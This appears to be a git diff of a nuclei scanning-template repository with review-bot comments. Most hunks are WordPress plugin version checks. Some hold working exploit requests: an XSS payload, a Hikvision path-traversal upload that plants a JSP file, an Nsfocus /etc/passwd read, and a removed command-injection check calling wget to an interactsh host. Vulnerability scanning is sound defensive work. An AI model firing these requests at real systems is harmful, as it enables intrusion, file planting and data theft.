@@ -36,7 +46,6 @@ requests: Referer: {{BaseURL}}/admin/view:shop/action:options option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother - - | POST /module/ HTTP/2 Host: {{Hostname}} @@ -45,13 +54,12 @@ requests: module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - 'contains(body_2,"true")' - contains(body_3,'\">\" placeholder=\"Use default') - - 'contains(all_headers_3,"text/html")' + - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and +# digest: 490a00463044022000cc9a8206ccbc823b71b7d11682af57eb62c7cd6d15308e393af5d9460b13a00220128133adc23ad3f11a14baec1fdfa7049669509da1033a5bb705a1ccb4e4e650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/debug/wp-debug-log.yaml b/poc/debug/wp-debug-log.yaml old mode 100755 new mode 100644 index 2658a93803..8b743b299e --- a/poc/debug/wp-debug-log.yaml +++ b/poc/debug/wp-debug-log.yaml 
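Review bot: The appended `# digest:` line is a template signature, and a signature only verifies against the exact bytes that were signed; this file carries local edits (for example the added `kenzer-templates` reference), so unless it was re-signed after them nuclei will, as far as I can tell, report the signature as invalid and treat the template as unsigned. Either re-sign after editing or drop the digest line rather than carry a stale one. Removing `cookie-reuse: true` and `req-condition: true` alongside the `requests:` to `http:` rename matches the newer protocol defaults, but the DSL still references `body_2`, `body_3` and `header_3`, so confirm the multi-request condition is still evaluated on the nuclei version this repository targets.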
@@ -1,43 +1,25 @@ id: wp-debug-log info: name: WordPress debug log - author: - - l0ne1y - description: |- - WordPress debug log 调试信息泄漏漏洞 - WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 - WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 + author: geraldino2,dwisiswant0 severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com - - 临时修复方案: - 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 - 2、将敏感信息进行加密存储,非必要不可发送前端 - 3、发送敏感信息时需加密传输,如有必要需脱敏处理 - 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 - 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 - 令、会话标识jsessionid等), 防止敏感信息泄漏。 - 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 - 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 - 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + tags: wordpress,log requests: -- matchers: - - type: word - condition: or - part: header - words: - - octet-stream - - text/plain - - type: regex - part: body - regex: - - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/wp-content/debug.log' - method: GET + - method: GET + path: + - "{{BaseURL}}/wp-content/debug.log" + matchers-condition: and + matchers: + - type: word + words: + - octet-stream + - text/plain + part: header + condition: or + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body + - type: status + status: + - 200 diff --git a/poc/google/google-secrets.yaml b/poc/google/google-secrets.yaml index d9cb5cef3a..a689838b9d 100644 --- a/poc/google/google-secrets.yaml +++ b/poc/google/google-secrets.yaml 
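Review bot: The timestamp regex `[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} ... [A-Z]{3}] PHP` has unescaped brackets: the leading `[[0-9]` is a character class matching `[` or a digit and the trailing `]` is accepted by Go's parser as a bare literal, so the expression only matches a debug.log line by accident (the match starts after the opening bracket); escape them so the intent is explicit, `- "\\[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}\\] PHP"`. The rewritten info block also drops the description entirely; add one line, e.g. `description: WordPress debug.log exposed at /wp-content/debug.log, disclosing PHP errors and related server information.`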
@@ -15,21 +15,21 @@ file: extractors: - type: regex - name: facebook-access-token + name: google-api-key regex: - - "EAACEdEose0cBA[0-9A-Za-z]+" + - "AIza[0-9A-Za-z\\\\-_]{35}" - type: regex - name: facebook-client-id + name: google-cloud-platform-api-key regex: - - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" + - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" - type: regex - name: facebook-oauth + name: google-oauth regex: - - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" + - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" - type: regex - name: facebook-secret-key + name: google-oauth-access-token regex: - - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" + - "ya29\\\\.[0-9A-Za-z\\\\-_]+" diff --git a/poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml b/poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml new file mode 100644 index 0000000000..255f27faba --- /dev/null +++ b/poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml 
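Review bot: Three of the four new regexes are over-escaped for a YAML double-quoted scalar, as printed here. `"AIza[0-9A-Za-z\\\\-_]{35}"` reaches the engine as `[0-9A-Za-z\\-_]`, a class containing a backslash and the range backslash-to-underscore but not the hyphen itself, so keys containing `-` are missed; `"ya29\\\\.[…]+"` reaches it as `ya29\\.`, which demands a literal backslash after `ya29` and never matches a real token; and the GCP pattern wraps the key in `[AIza[…]{35}]`, turning `AIza` into a character class and then requiring a literal `]` before the closing quote. The `google-oauth` line in the same hunk (`\\.apps\\.googleusercontent\\.com`) shows the correct single level of doubling. Changed lines: `- "AIza[0-9A-Za-z\\-_]{35}"`, `- "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"]AIza[0-9A-Za-z\\-_]{35}['\\\"]"`, `- "ya29\\.[0-9A-Za-z\\-_]+"`.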
@@ -0,0 +1,59 @@ +id: custom-css-js-php-38595c300b5439c3ff06f9de9b42f302 + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml 
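Review bot: The info block ships placeholder fields: `description: >` is empty, `cvss-metrics:`, `cvss-score:` and `cve-id:` carry no value, and `shodan-query: 'vuln:'` is an incomplete query, while `tags` still includes `cve` although no CVE id is given. The empty classification keys load as empty/zero values and the `cve` tag makes the template surface under `-tags cve` filtering with nothing to cite; either fill the fields from the linked Wordfence advisory or drop the empty keys and the `cve` tag. The same placeholder layout is repeated in the advanced-backgrounds, delicious-recipes, elementor, essential-addons-for-elementor-lite, html5-video-player and nova-blocks hunks later in this patch.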
@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/other/Hikvision_Env_Information_Leakage.yaml +++ b/poc/other/Hikvision_Env_Information_Leakage.yaml 
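Review bot: The rewritten template writes `test.jsp` into the target's `eportal` webapp through the traversal filename and then only fetches it; nothing removes the file, so every scan leaves a live JSP behind on the host, and the `description` should at least state that side effect so operators can clean up. `contains(body_2, "test")` is a weak confirmation because an error page that echoes the requested path also contains the word; a more distinctive marker would reduce false positives. The identical patch is applied to `poc/other/Hikvision_Env_Information_Leakage.yaml` in the next hunk, so that file no longer matches its name and both files now declare the same `id: HiKVISION`, which nuclei flags as a duplicate template id; rename or remove the duplicate.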
@@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 
'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index b35ef84818..1cd783867f 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml @@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,36 +14,15 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - - "200" + - "nologin" - type: status status: - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" diff --git a/poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml b/poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml new file mode 100644 index 0000000000..51b37be85a --- /dev/null +++ b/poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml 
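Review bot: The new `description` does not describe this template: it talks about an arbitrary user login via `www/local_User.php`, while the `name`, the `/webconf/GetFile/index?path=...` request and the `nologin` matcher are an arbitrary file read; the text looks copied from a different entry and should be replaced, e.g. `There is an arbitrary file read vulnerability in the Green Alliance SAS fortress GetFile interface; the path parameter is presumably not validated, allowing traversal to server files.` The `nologin` word is a reasonable confirmation for a passwd file, and the surrounding `matchers-condition: and` plus status check sit outside the hunk. The second hunk only deletes a commented-out block.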
@@ -0,0 +1,59 @@ +id: advanced-backgrounds-7eca2ce569a1f864194b199d672f550a + +info: + name: > + Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/advanced-backgrounds/" + google-query: inurl:"/wp-content/plugins/advanced-backgrounds/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,advanced-backgrounds,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-backgrounds" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.12.3') \ No newline at end of file diff --git a/poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml b/poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml new file mode 100644 index 0000000000..7da5cecc51 --- /dev/null +++ b/poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml 
@@ -0,0 +1,59 @@ +id: delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c + +info: + name: > + WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) <= 1.6.9 - Improper Path Validation to Authenticated (Subscriber+) Arbitrary File Move and Read + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/delicious-recipes/" + google-query: inurl:"/wp-content/plugins/delicious-recipes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,delicious-recipes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/delicious-recipes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicious-recipes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.9') \ No newline at end of file diff --git a/poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml b/poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml new file mode 100644 index 0000000000..ef674f0afd --- /dev/null +++ b/poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml 
@@ -0,0 +1,59 @@ +id: elementor-4124ad49f7a0510cf08a935c97d1246a + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.23.4 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23.4') \ No newline at end of file diff --git a/poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml b/poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml new file mode 100644 index 0000000000..53169f4dd7 --- /dev/null +++ b/poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml 
@@ -0,0 +1,59 @@ +id: essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3 + +info: + name: > + Essential Addons for Elementor -- Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Fancy Text Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/other/groovy-console-open.yaml b/poc/other/groovy-console-open.yaml index 362d732f8d..b37f3f8d94 100644 --- a/poc/other/groovy-console-open.yaml +++ b/poc/other/groovy-console-open.yaml 
@@ -1,22 +1,22 @@ id: aem-groovyconsole - info: - name: AEM Groovy console exposed - author: d3sca + name: AEM Groovy Console Discovery + author: Dheerajmadhukar severity: critical - description: Groovy console is exposed. - tags: aem - + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem,adobe requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/groovyconsole.html" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -29,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml b/poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml new file mode 100644 index 0000000000..acc833f55e --- /dev/null +++ b/poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml 
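Review bot: `severity: critical` is kept while the template only confirms that a Groovy console page answers at one of the two paths; the new description already hedges this (`can possibly lead to remote code execution`), so either the severity should reflect an exposure finding or the description should state what condition the word matcher, which sits outside this hunk, actually verifies. `stop-at-first-match: true` is appropriate with two candidate paths. The second hunk only appends a dated `# Enhanced by` comment.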
@@ -0,0 +1,59 @@ +id: html5-video-player-54a27fb63349216a80cf2f59f38ae402 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.32 - Missing Authorization in multiple functions via h5vp_ajax_handler + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908df18e-7178-4d40-becb-86e1a714a7da?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,html5-video-player,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.32') \ No newline at end of file diff --git a/poc/other/jenk.yaml b/poc/other/jenk.yaml index 62a1aba442..1ce87d12b2 100644 --- a/poc/other/jenk.yaml +++ b/poc/other/jenk.yaml @@ -53,4 +53,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/other/nova-blocks.yaml b/poc/other/nova-blocks.yaml new file mode 100644 index 0000000000..77aa268153 --- /dev/null +++ b/poc/other/nova-blocks.yaml @@ -0,0 +1,59 @@ +id: nova-blocks + +info: + name: > + Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nova-blocks/" + google-query: inurl:"/wp-content/plugins/nova-blocks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nova-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nova-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.7') \ No newline at end of file diff --git a/poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml b/poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml new file mode 100644 index 0000000000..1ab732c550 --- /dev/null +++ b/poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml 
@@ -0,0 +1,59 @@ +id: post-grid-eaed240a4f4b283e08088fd58f4489e7 + +info: + name: > + Post Grid and Gutenberg Blocks 2.2.87 - 2.2.90 - Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-grid/" + google-query: inurl:"/wp-content/plugins/post-grid/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 2.2.87', '<= 2.2.90') \ No newline at end of file diff --git a/poc/other/qualitor.yaml b/poc/other/qualitor.yaml new file mode 100644 index 0000000000..3337247c18 --- /dev/null +++ b/poc/other/qualitor.yaml @@ -0,0 +1,20 @@ +id: qualitor +info: + name: qualitor + author: cn-kali-team + tags: detect,tech,qualitor + severity: info + metadata: + fofa-query: + - qualitor + product: qualitor + vendor: qualitor + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - qualitor diff --git a/poc/other/slider-comparison-image-before-and-after.yaml b/poc/other/slider-comparison-image-before-and-after.yaml new file mode 100644 index 0000000000..d38336f96e --- /dev/null +++ b/poc/other/slider-comparison-image-before-and-after.yaml 
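Review bot: The new `qualitor.yaml` fingerprint matches the bare word `qualitor` anywhere in the body of `/` and already declares `verified: true`, which will flag any page that merely mentions the product name. A technology-detect template should pin a more specific token (page title, a script or asset path, a server header) and add a `status` matcher, or drop `verified: true` until that has been done. `fofa-query` is written as a YAML list here while every other template in this commit uses a scalar, so a consumer reading that field as a string will get a list. The post-grid template above it shares the empty-`info` problem noted at L69.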
